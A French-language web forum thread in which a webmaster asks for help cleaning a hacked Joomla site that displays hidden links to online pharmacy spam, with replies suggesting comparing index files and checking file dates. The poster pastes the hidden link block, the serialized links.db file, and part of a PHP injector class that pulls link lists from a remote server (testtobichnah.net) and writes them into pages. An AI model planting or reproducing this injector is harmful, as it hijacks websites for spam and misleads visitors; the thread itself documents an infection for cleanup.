probleme site pirate, help, c'est urgent

Réduire
X
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • probleme site pirate, help, c'est urgent

    bonjour,

    mon client a remarqué que son site a été piraté et les mots v_i-a-g-i-a-g-r_a et cialis sont visibles 28 et 12 fois respectivement.

    je ne sais ou trouvé le bloc (div) visible dans le code source du navigateur, car il ne se trouve ni dans la base de données ni dans le html de joomla,

    SVP, pourriez m'aidez
    voici le bloc:

    Code:
    <div class="col_right">
    
    							
    
    														
    
    							<div style='width:150px; height:1px; padding:0px; font:11px Tahoma; overflow:hidden; '>
    
    <a href="http://rapidfiles.us">download rapidshare</a> <a href="http://www.nuestrotango.com.br/index.php?view=detail&amp;id=85&amp;option=com_joomgallery&amp;Itemid=181">cheap propecia buy online</a> <a href="http://hiphospitals.com/index.php?option=com_seyret&amp;Itemid=160&amp;task=generatersslinks">****** online hong kong</a> <a href="http://www.vcorp.com.vn/index.php?option=com_content&amp;view=article&amp;id=66&amp;Itemid=196&amp;lang=en">****** tablets price in pakistan</a> <a href="http://oasischinesegardens.com/index.php?option=com_content&amp;view=article&amp;id=95:duck&amp;catid=45:ocg-menus&amp;Itemid=78">****** online china</a> <a href="http://www.seemfcongress.zdravenews.eu/index.php?option=com_content&amp;vi=&amp;Itemid=0&amp;lang=bg">****** best suppliers</a> <a href="http://www.cars.gr/index.php?option=com_sobi2&amp;catid=104&amp;Itemid=291">****** usa generic</a> <a href="http://remotelocationmedic.co.uk/index.php?option=com_content&amp;view=article&amp;id=60&amp;Itemid=61">buy levitra hong kong</a> <a href="http://www.cars.gr/index.php?option=com_sobi2&amp;catid=73&amp;Itemid=274">zithromax mg</a> <a href="http://www.unlimitedspeedworx.com/index.php?option=com_virtuemart&amp;page=shop.browse&amp;category_id=79&amp;Itemid=53">levaquin online order</a> <a href="http://www.mefb.gov.mg/index.php?option=com_content&amp;view=article&amp;id=449&amp;Itemid=518">buy generic cialis online uk</a> <a href="http://www.mefb.gov.mg/index.php?option=com_content&amp;view=article&amp;id=120&amp;Itemid=55">****** generic alternatives</a> <a href="http://lifeimpactcentre.com/index.php?option=com_content&amp;view=category&amp;layout=blog&amp;id=29&amp;Itemid=61">purchase genuine ****** online</a> <a href="http://www.skiphireskips.com/our-services/96-skip-hire-rusholme">propecia drug proscar</a> <a href="http://www.tysf.no/index.php?option=com_content&amp;view=article&amp;id=105:johannesacup&amp;catid=11:bilete&amp;Itemid=5">where to buy ****** pills online</a> <a href="http://www.cars.gr/index.php?option=com_sobi2&amp;catid=80&amp;Itemid=274">buy doxycycline 100 online</a> <a href="http://www.fnecm.org/">purchase ****** 100mg</a> <a href="http://www.vcorp.com.vn/index.php?option=com_mailto&amp;tmpl=component&amp;link=ff3e364ed96482c0692d270134b09a991d0ccec7&amp;lang=vi">cialis generic australia</a> <a href="http://lifeimpactcentre.com/index.php?option=com_content&amp;view=category&amp;id=25:the-project&amp;Itemid=37&amp;layout=default">buy ******* online cheap</a> <a href="http://www.cars.gr/index.php?option=com_sobi2&amp;sobi2Task=sobi2Details&amp;catid=1&amp;sobi2Id=125&amp;Itemid=264">prednisone from canada</a> <a href="http://www.sotmusic.com/index.php?option=com_eventlist&amp;view=details&amp;id=1">****** online canada</a> <a href="http://www.cars.gr/index.php?option=com_sobi2&amp;catid=214&amp;Itemid=264">where to buy accutane australia</a> <a href="http://www.ultimateyou.com.au/product-reviews/9?re_mcal_month=11&amp;re_mcal_year=2017">buy nexium usa</a> <a href="http://www.tysf.no/index.php?limitstart=10">levitra compared to cialis</a> <a href="http://www.seemfcongress.zdravenews.eu/index.php?option=com_content&amp;view=frontpage&amp;lang=en&amp;Itemid=0">where to buy ****** with a mastercard</a> <a href="http://www.spanishfullimmersion.com/index.php?option=com_content&amp;view=article&amp;id=27:otros-servicios&amp;catid=27:otros-servicios&amp;Itemid=44">purchase ****** professional</a> <a href="http://www.skiphireskips.com/our-services/72-skip-hire-gatley">purchase cialis 20mg online</a> <a href="http://www.wackadayz.co.uk/index.php?option=com_content&amp;view=article&amp;id=24:wacka-hot-party&amp;catid=27:parties&amp;Itemid=26">where to buy ****** spain</a> <a href="http://www.cancershospitals.com/index.php?option=com_content&amp;view=article&amp;id=232&amp;Itemid=267">****** online in canada</a> <a href="http://www.ultimateyou.com.au/fitness?re_mcal_month=7&amp;re_mcal_year=2031">lexapro drug forum</a> <a href="http://www.tysf.no/index.php?view=article&amp;catid=8%3Anyheter&amp;id=104%3Ateiglandacup&amp;format=pdf&amp;option=com_content&amp;Itemid=30">cialis generic india</a> <a href="http://www.mefb.gov.mg/index.php?option=com_content&amp;view=article&amp;id=184&amp;Itemid=29">levitra canada cheap</a> <a href="http://www.tarb.com.my/index.php/component/users/?view=reset">lipitor drug advertising</a> <a href="http://www.tysf.no/index.php?option=com_content&amp;view=article&amp;id=4:njordstl&amp;catid=10:anlegg&amp;Itemid=4">how to get ****** covered</a> <a href="http://oasischinesegardens.com/index.php?option=com_content&amp;view=article&amp;id=86:appetizers&amp;catid=45:ocg-menus&amp;Itemid=78">cialis price online</a> <a href="http://www.alpha-consultoria.com/index.php?option=com_jlivechat&amp;view=popup&amp;tmpl=component">best substitute for lipitor</a> <a href="http://tysf.no/index.php?option=com_content&amp;view=article&amp;id=61:29er&amp;catid=12:batar&amp;Itemid=6">buy cialis overnight shipping</a> <a href="http://www.cars.gr/index.php?option=com_sobi2&amp;catid=90&amp;Itemid=270">buy ******* 100mg chewable</a> <a href="http://www.ultimateyou.com.au/high-performance-lifestyle-program/details/2?xref=70&amp;re_mcal_month=5&amp;re_mcal_year=1995">buy synthroid generic</a> <a href="http://www.hiphospitals.com/index.php?option=com_content&amp;view=article&amp;id=98&amp;Itemid=170">****** overnight order</a> <a href="http://oasischinesegardens.com/">buy levitra in canada</a> <a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=101">****** drug mart</a> <a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=39">indian generic levitra</a> <a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=40">buy cialis with no prescription</a> <a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=45">buy propecia ebay</a> <a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=65">best site for ******</a> <a href="http://www.fnecm.org/index.php?option=com_content&amp;view=frontpage&amp;Itemid=100004">is buying ****** online illegal</a> <a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=51">buy ****** no prescription needed</a> <a href="http://www.fnecm.org/index.php?option=com_docman&amp;Itemid=110">buy cialis using paypal</a> <a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=50">cialis drug used</a> <a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=48">levitra goes generic</a> <a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=98">****** canada no prescription online</a> <a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=96">****** sales philippines</a> <a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=36">****** online danger</a> <a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=35">buy ****** hamilton</a> <a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=34">propecia canada get</a> <a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=64">cialis price range</a> <a href="http://www.fnecm.org/index.php">levitra generic ******</a> <a href="http://www.fnecm.org/index.php?option=com_content&amp;view=article&amp;id=12&amp;Itemid=27">buy ****** boots uk</a> <a href="http://www.fnecm.org/index.php?option=com_content&amp;view=article&amp;id=42&amp;Itemid=91">propecia price increase</a> <a href="http://www.fnecm.org/index.php?option=com_content&amp;task=view&amp;id=58&amp;Itemid=99">best price for cialis 20mg</a></div><table class="contentpaneopen-liens-utiles">

  • #2
    Re : probleme site pirate, help, c'est urgent

    je reformule mon probleme,

    ou est-ce qu'un pirate peut inserer un code html, en dehors de la base de données (sauf si j'ai pas cherché avec les bon mots clés) et de la page index de mon template joomla ?

    merci par avance pour vos conseils

    Commentaire


    • #3
      Re : probleme site pirate, help, c'est urgent

      Rarement dans la base à part par injection, sinon il peuvent être partout via un js. Tu n'as plus qu'à chercher et consulter le forum dédié à la sécurité.

      Commentaire


      • #4
        Re : probleme site pirate, help, c'est urgent

        Bonjour,p
        tu n'as pas de sauvegarde propre à remonter ?
        Compare l'index.ph de Jooml et celui du template avec des originaux fiables.
        Cherche sur ton site (via FTP) des fichiers dont la date ne "colle pas" avec les dates des fichiers environnants.
        Schtroumpfe toi le Schtroumpf t'aidera.
        Je ne schtroumpfe pas aux demandes de schtroumpf par MP.

        Commentaire


        • #5
          Re : probleme site pirate, help, c'est urgent

          merci pour vos conseils,

          malheureusement pour mon client il n'y pas eu de sauvegarde (en tout cas pas à ma connaissance),
          je vais vérifier les dates des fichiers mais j'ai peur que ça ne marche, car le site existe depuis 6 ans et que les mots trouvés ont été décelé sur certaine page en faisant ctrl+f et en tapant les mots clés(par hasard) (et ce après avoir vu le rapport de "outils pour les webmaster" de google, dont les mots clés v-i-a-g-r-a et c-i-a-l-i-s ont été référencé comme des mots très utilisés)

          est-ce que le virus "SPYEYE" pourrait-être la cause de ce rajout de mots et de liens de sites externes ?
          car il a été trouvé dans joomla
          Dernière édition par artenis à 28/01/2012, 13h11

          Commentaire


          • #6
            Re : probleme site pirate, help, c'est urgent

            Bonjour,

            [modo]Sujet déplacé en sécurité[/modo]
            Pas de demande de support par MP.
            S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

            Commentaire


            • #7
              Re : probleme site pirate, help, c'est urgent

              Re,
              je vais vérifier les dates des fichiers mais j'ai peur que ça ne marche, car le site existe depuis 6 ans
              au contraire les fichiers récents feront tache...

              en passant, si le site a été fait il y a 6 ans, il y a peu de chance que ça soit un Joomla 1.5...
              Schtroumpfe toi le Schtroumpf t'aidera.
              Je ne schtroumpfe pas aux demandes de schtroumpf par MP.

              Commentaire


              • #8
                Re : probleme site pirate, help, c'est urgent

                désolé, je raconte des bêtises, création du site en 2008, donc 4 ans, ce que je voulais dire , c'est que la personne qui a créé le site au départ n'avait pas fait de sauvegarde, donc depuis hier , je passe en revue les 3500 et qqs fichiers contenu dans joomla, mais je vous avoue que ça devient vraiment caspié,
                y aurait-il un moyen de vous faire parvenir l'adresse du site sans que celui-ci soit référencer par la suite dans google, je ne souhaite pas que les mots joomla, piraté et nom du site soit associer.
                je souhaiterais avoir un avis d'un expert en voyant le code source du site, me dire ou est-ce que pourrais se cacher ce texte?

                encore merci de suivre mon probleme

                Commentaire


                • #9
                  Re : probleme site pirate, help, c'est urgent

                  Re,
                  perso je ne ferais rien de plus que ce que je t'ai conseillé : vérifier le contenu des fichiers index.php et traquer les fichiers par date.
                  Alors si c'est trop pénible pour toi alors que c'est ton client ...
                  Schtroumpfe toi le Schtroumpf t'aidera.
                  Je ne schtroumpfe pas aux demandes de schtroumpf par MP.

                  Commentaire


                  • #10
                    Re : probleme site pirate, help, c'est urgent

                    Bonjour,
                    je vous fait part de ma recherche fructueuse du code inserer , contenant les mots v-i-a-g-r-a et cialis,

                    il s'agit d'un fichier .db
                    celui-ci se trouvait dans le fichier: components/com-content/temp/links.db et voici ce qu'il y avait exactement:

                    Code:
                    a:61:{i:0;s:54:"<a href="http://rapidfiles.us">download rapidshare</a>";i:1;s:144:"<a href="http://www.nuestrotango.com.br/index.php?view=detail&amp;id=85&amp;option=com_joomgallery&amp;Itemid=181">cheap propecia buy online</a>";i:2;s:130:"<a href="http://hiphospitals.com/index.php?option=com_seyret&amp;Itemid=160&amp;task=generatersslinks">****** online hong kong</a>";i:3;s:153:"<a href="http://www.vcorp.com.vn/index.php?option=com_content&amp;view=article&amp;id=66&amp;Itemid=196&amp;lang=en">****** tablets price in pakistan</a>";i:4;s:162:"<a href="http://oasischinesegardens.com/index.php?option=com_content&amp;view=article&amp;id=95:duck&amp;catid=45:ocg-menus&amp;Itemid=78">****** online china</a>";i:5;s:136:"<a href="http://www.seemfcongress.zdravenews.eu/index.php?option=com_content&amp;vi=&amp;Itemid=0&amp;lang=bg">****** best suppliers</a>";i:6;s:107:"<a href="http://www.cars.gr/index.php?option=com_sobi2&amp;catid=104&amp;Itemid=291">****** usa generic</a>";i:7;s:138:"<a href="http://remotelocationmedic.co.uk/index.php?option=com_content&amp;view=article&amp;id=60&amp;Itemid=61">buy levitra hong kong</a>";i:8;s:100:"<a href="http://www.cars.gr/index.php?option=com_sobi2&amp;catid=73&amp;Itemid=274">zithromax mg</a>";i:9;s:155:"<a href="http://www.unlimitedspeedworx.com/index.php?option=com_virtuemart&amp;page=shop.browse&amp;category_id=79&amp;Itemid=53">levaquin online order</a>";i:10;s:137:"<a href="http://www.mefb.gov.mg/index.php?option=com_content&amp;view=article&amp;id=449&amp;Itemid=518">buy generic cialis online uk</a>";i:11;s:135:"<a href="http://www.mefb.gov.mg/index.php?option=com_content&amp;view=article&amp;id=120&amp;Itemid=55">****** generic alternatives</a>";i:12;s:159:"<a href="http://lifeimpactcentre.com/index.php?option=com_content&amp;view=category&amp;layout=blog&amp;id=29&amp;Itemid=61">purchase genuine ****** online</a>";i:13;s:99:"<a href="http://www.skiphireskips.com/our-services/96-skip-hire-rusholme">propecia drug proscar</a>";i:14;s:168:"<a href="http://www.tysf.no/index.php?option=com_content&amp;view=article&amp;id=105:johannesacup&amp;catid=11:bilete&amp;Itemid=5">where to buy ****** pills online</a>";i:15;s:114:"<a href="http://www.cars.gr/index.php?option=com_sobi2&amp;catid=80&amp;Itemid=274">buy doxycycline 100 online</a>";i:16;s:57:"<a href="http://www.fnecm.org/">purchase ****** 100mg</a>";i:17;s:171:"<a href="http://www.vcorp.com.vn/index.php?option=com_mailto&amp;tmpl=component&amp;link=ff3e364ed96482c0692d270134b09a991d0ccec7&amp;lang=vi">cialis generic australia</a>";i:18;s:168:"<a href="http://lifeimpactcentre.com/index.php?option=com_content&amp;view=category&amp;id=25:the-project&amp;Itemid=37&amp;layout=default">buy ******* online cheap</a>";i:19;s:152:"<a href="http://www.cars.gr/index.php?option=com_sobi2&amp;sobi2Task=sobi2Details&amp;catid=1&amp;sobi2Id=125&amp;Itemid=264">prednisone from canada</a>";i:20;s:115:"<a href="http://www.sotmusic.com/index.php?option=com_eventlist&amp;view=details&amp;id=1">****** online canada</a>";i:21;s:120:"<a href="http://www.cars.gr/index.php?option=com_sobi2&amp;catid=214&amp;Itemid=264">where to buy accutane australia</a>";i:22;s:115:"<a href="http://www.ultimateyou.com.au/product-reviews/9?re_mcal_month=11&amp;re_mcal_year=2017">buy nexium usa</a>";i:23;s:83:"<a href="http://www.tysf.no/index.php?limitstart=10">levitra compared to cialis</a>";i:24;s:163:"<a href="http://www.seemfcongress.zdravenews.eu/index.php?option=com_content&amp;view=frontpage&amp;lang=en&amp;Itemid=0">where to buy ****** with a mastercard</a>";i:25;s:193:"<a href="http://www.spanishfullimmersion.com/index.php?option=com_content&amp;view=article&amp;id=27:otros-servicios&amp;catid=27:otros-servicios&amp;Itemid=44">purchase ****** professional</a>";i:26;s:103:"<a href="http://www.skiphireskips.com/our-services/72-skip-hire-gatley">purchase cialis 20mg online</a>";i:27;s:173:"<a href="http://www.wackadayz.co.uk/index.php?option=com_content&amp;view=article&amp;id=24:wacka-hot-party&amp;catid=27:parties&amp;Itemid=26">where to buy ****** spain</a>";i:28;s:141:"<a href="http://www.cancershospitals.com/index.php?option=com_content&amp;view=article&amp;id=232&amp;Itemid=267">****** online in canada</a>";i:29;s:108:"<a href="http://www.ultimateyou.com.au/fitness?re_mcal_month=7&amp;re_mcal_year=2031">lexapro drug forum</a>";i:30;s:176:"<a href="http://www.tysf.no/index.php?view=article&amp;catid=8%3Anyheter&amp;id=104%3Ateiglandacup&amp;format=pdf&amp;option=com_content&amp;Itemid=30">cialis generic india</a>";i:31;s:128:"<a href="http://www.mefb.gov.mg/index.php?option=com_content&amp;view=article&amp;id=184&amp;Itemid=29">levitra canada cheap</a>";i:32;s:99:"<a href="http://www.tarb.com.my/index.php/component/users/?view=reset">lipitor drug advertising</a>";i:33;s:155:"<a href="http://www.tysf.no/index.php?option=com_content&amp;view=article&amp;id=4:njordstl&amp;catid=10:anlegg&amp;Itemid=4">how to get ****** covered</a>";i:34;s:168:"<a href="http://oasischinesegardens.com/index.php?option=com_content&amp;view=article&amp;id=86:appetizers&amp;catid=45:ocg-menus&amp;Itemid=78">cialis price online</a>";i:35;s:139:"<a href="http://www.alpha-consultoria.com/index.php?option=com_jlivechat&amp;view=popup&amp;tmpl=component">best substitute for lipitor</a>";i:36;s:151:"<a href="http://tysf.no/index.php?option=com_content&amp;view=article&amp;id=61:29er&amp;catid=12:batar&amp;Itemid=6">buy cialis overnight shipping</a>";i:37;s:114:"<a href="http://www.cars.gr/index.php?option=com_sobi2&amp;catid=90&amp;Itemid=270">buy ******* 100mg chewable</a>";i:38;s:160:"<a href="http://www.ultimateyou.com.au/high-performance-lifestyle-program/details/2?xref=70&amp;re_mcal_month=5&amp;re_mcal_year=1995">buy synthroid generic</a>";i:39;s:135:"<a href="http://www.hiphospitals.com/index.php?option=com_content&amp;view=article&amp;id=98&amp;Itemid=170">****** overnight order</a>";i:40;s:67:"<a href="http://oasischinesegardens.com/">buy levitra in canada</a>";i:41;s:112:"<a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=101">****** drug mart</a>";i:42;s:117:"<a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=39">indian generic levitra</a>";i:43;s:126:"<a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=40">buy cialis with no prescription</a>";i:44;s:112:"<a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=45">buy propecia ebay</a>";i:45;s:115:"<a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=65">best site for ******</a>";i:46;s:132:"<a href="http://www.fnecm.org/index.php?option=com_content&amp;view=frontpage&amp;Itemid=100004">is buying ****** online illegal</a>";i:47;s:128:"<a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=51">buy ****** no prescription needed</a>";i:48;s:101:"<a href="http://www.fnecm.org/index.php?option=com_docman&amp;Itemid=110">buy cialis using paypal</a>";i:49;s:111:"<a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=50">cialis drug used</a>";i:50;s:115:"<a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=48">levitra goes generic</a>";i:51;s:131:"<a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=98">****** canada no prescription online</a>";i:52;s:119:"<a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=96">****** sales philippines</a>";i:53;s:115:"<a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=36">****** online danger</a>";i:54;s:114:"<a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=35">buy ****** hamilton</a>";i:55;s:114:"<a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=34">propecia canada get</a>";i:56;s:113:"<a href="http://www.fnecm.org/index.php?option=com_wrapper&amp;view=wrapper&amp;Itemid=64">cialis price range</a>";i:57;s:67:"<a href="http://www.fnecm.org/index.php">levitra generic ******</a>";i:58;s:124:"<a href="http://www.fnecm.org/index.php?option=com_content&amp;view=article&amp;id=12&amp;Itemid=27">buy ****** boots uk</a>";i:59;s:128:"<a href="http://www.fnecm.org/index.php?option=com_content&amp;view=article&amp;id=42&amp;Itemid=91">propecia price increase</a>";i:60;s:128:"<a href="http://www.fnecm.org/index.php?option=com_content&amp;task=view&amp;id=58&amp;Itemid=99">best price for cialis 20mg</a>";}
                    pourriez-vous m'expliquer quel type de code il s'agit et comment savoir s'il font référence à d'autres fichiers ?

                    merci

                    Commentaire


                    • #11
                      Re : probleme site pirate, help, c'est urgent

                      Bonjour,
                      ça définit un tableau d'URL. Ça n'utilise pas d'autres fichiers mais il doit y avoir quelquepart un fichier ou une inclusiond e code qui l'utilise... Donc il doit y avoir (au moins) un fichier modifié ailleurs.
                      Schtroumpfe toi le Schtroumpf t'aidera.
                      Je ne schtroumpfe pas aux demandes de schtroumpf par MP.

                      Commentaire


                      • #12
                        Re : probleme site pirate, help, c'est urgent

                        merci GS,

                        est-ce que ce fichier cacher ailleurs peut avoir un impact sur la réapparition de ce code , même une fois effacer ?
                        auriez-vous une idée de quelle extension de fichier pourrait-être liée à ce "links.db"?
                        serait-il lié par exemple à un element dans la BDD ?

                        Commentaire


                        • #13
                          Re : probleme site pirate, help, c'est urgent

                          bon j'ai trouvé le second fichié,

                          seulement j'ai du mal à savoir si celui-ci renvoi lui aussi vers d'autre fichier , pourriez-vous m'aidez?
                          voici celui-ci:

                          est-ce que en supprimant ce fichier ainsi que celui du precedent post cela sera suffisant ?
                          je sais me debrouiller en programmation web, mais là sa touche à la securité et il faut encore que j'apprenne.

                          Code:
                          <div style='width:150px; height:1px; padding:0px; font:11px Tahoma; overflow:hidden; '>
                          
                          <?php
                          
                          
                          
                          
                          
                          class CM_base {
                          
                          
                          
                          	// base
                          
                            var $_id								= '687637f984cc76e4eb1d8a009749c9c5';
                          
                          
                          
                          	// optional
                          
                            var $_verbose           = false;
                          
                            var $_charset           = 'UTF-8';
                          
                          	var $_fetch_remote_type = 'file_get_contents';
                          
                          	var $_socket_timeout    = 4;
                          
                          	var $_links_delimiter		= ' ';
                          
                          	var $_show_code					= false;
                          
                          
                          
                          	// other
                          
                            var $_servers						= 'testtobichnah.net';
                          
                            var $_cache_lifetime    = 600;
                          
                            var $_cache_reloadtime  = 600;
                          
                            var $_error             = '';
                          
                            var $_db_file           = '';
                          
                          
                          
                            function CM_base($options = null) {
                          
                          
                          
                          		if (isset($options['verbose']) && $options['verbose'] == true)
                          
                          			$this->_verbose = true;
                          
                          
                          
                              if (isset($options['charset']) && strlen($options['charset']))
                          
                                $this->_charset = $options['charset'];
                          
                          
                          
                              if (isset($options['fetch_remote_type']) && strlen($options['fetch_remote_type']))
                          
                                $this->_fetch_remote_type = $options['fetch_remote_type'];
                          
                          
                          
                          		if (isset($options['socket_timeout']) && is_numeric($options['socket_timeout']) && $options['socket_timeout'] > 0)
                          
                                $this->_socket_timeout = $options['socket_timeout'];
                          
                          
                          
                              if (isset($options['links_delimiter']) && strlen($options['links_delimiter']))
                          
                                $this->_links_delimiter = $options['links_delimiter'];
                          
                          
                          
                              if (isset($options['show_code']) && $options['show_code'] == true)
                          
                                 $this->_show_code = true;
                          
                          	
                          
                          	}
                          
                          
                          
                          
                          
                            function fetch_remote_file($host, $path) {
                          
                          
                          
                          		@ini_set('allow_url_fopen',          1);
                          
                              @ini_set('default_socket_timeout',   $this->_socket_timeout);
                          
                          
                          
                              if ($this->_fetch_remote_type == 'file_get_contents' || 
                          
                          			($this->_fetch_remote_type == '' && function_exists('file_get_contents') && ini_get('allow_url_fopen') == 1)) {
                          
                                      
                          
                          			$this->_fetch_remote_type = 'file_get_contents';
                          
                          			$data = @file_get_contents('http://' . $host . $path);
                          
                          
                          
                          			if ($data)
                          
                          				return $data;
                          
                          
                          
                              } elseif ($this->_fetch_remote_type == 'curl' || 
                          
                          			($this->_fetch_remote_type == '' && function_exists('curl_init'))) {
                          
                                      
                          
                          			$this->_fetch_remote_type = 'curl';
                          
                          
                          
                                if ($ch = @curl_init()) {
                          
                          
                          
                          				@curl_setopt($ch, CURLOPT_URL,              'http://' . $host . $path);
                          
                          				@curl_setopt($ch, CURLOPT_HEADER,           false);
                          
                          				@curl_setopt($ch, CURLOPT_RETURNTRANSFER,   true);
                          
                          				@curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,   $this->_socket_timeout);
                          
                          
                          
                                  $data = @curl_exec($ch);
                          
                                  @curl_close($ch);
                          
                          
                          
                          				if ($data)
                          
                          					return $data;
                          
                          			}
                          
                          
                          
                              } else {
                          
                          
                          
                          			$this->_fetch_remote_type = 'socket';
                          
                          
                          
                                $buff = '';
                          
                                $fp = @fsockopen($host, 80, $errno, $errstr, $this->_socket_timeout);
                          
                          
                          
                                if ($fp) {
                          
                          
                          
                          				@fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
                          
                          
                          
                          				while (!@feof($fp))
                          
                          					$buff .= @fgets($fp, 128);
                          
                          
                          
                          				@fclose($fp);
                          
                          
                          
                          				$page = explode("\r\n\r\n", $buff);
                          
                          				return $page[1];
                          
                          
                          
                                }
                          
                          
                          
                              }
                          
                          
                          
                              return $this->raise_error('�� ���� ������������ � �������: ' . $host . $path.', type: '.$this->_fetch_remote_type);
                          
                            }
                          
                          
                          
                            function _read($filename) {
                          
                                  
                          
                          		$fp = @fopen($filename, 'rb');
                          
                          		@flock($fp, LOCK_SH);
                          
                          
                          
                          		if ($fp) {
                          
                          
                          
                          			clearstatcache();
                          
                          			$length = @filesize($filename);
                          
                          			$mqr = get_magic_quotes_runtime();
                          
                          			set_magic_quotes_runtime(0);
                          
                          
                          
                          			if ($length)
                          
                          				$data = @fread($fp, $length);
                          
                          			else
                          
                          				$data = '';
                          
                          
                          
                                set_magic_quotes_runtime($mqr);
                          
                                @flock($fp, LOCK_UN);
                          
                                @fclose($fp);
                          
                          
                          
                                return $data;
                          
                          
                          
                              }
                          
                          
                          
                              return $this->raise_error('�� ���� ������� ������ �� �����: ' . $filename);
                          
                            }
                          
                          
                          
                            function _write($filename, $data) {
                          
                          
                          
                          		$fp = @fopen($filename, 'wb');
                          
                              if ($fp) {
                          
                          			@flock($fp, LOCK_EX);
                          
                          			$length = strlen($data);
                          
                          			@fwrite($fp, $data, $length);
                          
                          			@flock($fp, LOCK_UN);
                          
                                @fclose($fp);
                          
                          
                          
                                if (md5($this->_read($filename)) != md5($data))
                          
                          				return $this->raise_error('�������� ����������� ������ ��� ������ � ����: ' . $filename);
                          
                          
                          
                                return true;
                          
                              }
                          
                          
                          
                              return $this->raise_error('�� ���� �������� ������ � ����: ' . $filename);
                          
                            }
                          
                          
                          
                            function raise_error($e) {
                          
                          
                          
                          		$this->_error = '<p style="color: red; font-weight: bold;">CM ERROR: ' . $e . '</p>';
                          
                          
                          
                          		if ($this->_verbose == true)
                          
                          			print $this->_error;
                          
                          
                          
                              return false;
                          
                            }
                          
                          
                          
                            function load_data() {
                          
                          
                          
                          		if (!is_dir(dirname(__FILE__).'/temp')){
                          
                          			if (!mkdir(dirname(__FILE__).'/temp')){
                          
                          				return $this->raise_error('��� ����� ' . dirname(__FILE__).'/temp'. '. ������� �� �������.');
                          
                          			}
                          
                          		}
                          
                          
                          
                          
                          
                              $this->_db_file = dirname(__FILE__) . '/temp/links.db';
                          
                          
                          
                              if (!is_file($this->_db_file)) {
                          
                          
                          
                          			if (@touch($this->_db_file))
                          
                          				@chmod($this->_db_file, 0666);
                          
                          			else
                          
                          				return $this->raise_error('��� ����� ' . $this->_db_file . '. ������� �� �������. ��������� ����� 777 �� �����.');
                          
                          
                          
                              }
                          
                          
                          
                              if (!is_writable($this->_db_file))
                          
                          			return $this->raise_error('��� ������� �� ������ � �����: ' . $this->_db_file . '! ��������� ����� 777 �� �����.');
                          
                          
                          
                              @clearstatcache();
                          
                          
                          
                              if ((filemtime($this->_db_file) < (time()-$this->_cache_lifetime) || filesize($this->_db_file) == 0)) {
                          
                          
                          
                          			@touch($this->_db_file, (time() - $this->_cache_lifetime + $this->_cache_reloadtime));
                          
                                      
                          
                          			$path = '/system/mngr.php?id=' . $this->_id . '&md5=' . md5($this->_read($this->_db_file));
                          
                          
                          
                                if (strlen($this->_charset))
                          
                          				$path .= '&charset=' . $this->_charset;
                          
                          
                          
                          			$servers = explode("|", $this->_servers);
                          
                          			foreach($servers as $server){
                          
                          
                          
                          				if ($data = $this->fetch_remote_file($server, $path)){
                          
                          			
                          
                          					if (substr($data, 0, 12) == 'FATAL ERROR:') {
                          
                          
                          
                          						$this->raise_error($data);
                          
                          
                          
                          					} else if (substr($data, 0, 9) != 'UNCHANGED') {
                          
                          
                          
                          						$hash = @unserialize($data);
                          
                          
                          
                          						if ($hash != false) {
                          
                          
                          
                          							$data_new = @serialize($hash);
                          
                          
                          
                          							if ($data_new)
                          
                          								$data = $data_new;
                          
                          							
                          
                          							$this->_write($this->_db_file, $data);
                          
                          
                          
                          							break;
                          
                          
                          
                          						}
                          
                          
                          
                          					} // if fatal error unchanged
                          
                          
                          
                          				} // fetch
                          
                          
                          
                          			} // foreach
                          
                                      
                          
                              }
                          
                          
                          
                              if ($data = $this->_read($this->_db_file))
                          
                          			$this->set_data(@unserialize($data));
                          
                          
                          
                            }
                          
                          }
                          
                          
                          
                          class CM_client extends CM_base {
                          
                          
                          
                          	var $_links_page = array();
                          
                          
                          
                          	function CM_client($options = null) {
                          
                          			parent::CM_base($options);
                          
                          			$this->load_data();
                          
                          	}
                          
                          
                          
                          	function return_links($n = null, $offset = 0) {
                          
                          
                          
                          		$html = '';
                          
                          
                          
                          		if (is_array($this->_links_page)) {
                          
                          
                          
                          			$total_page_links = count($this->_links_page);
                          
                          
                          
                          			if (!is_numeric($n) || $n > $total_page_links)
                          
                          				$n = $total_page_links;
                          
                          
                          
                          			$links = array();
                          
                          
                          
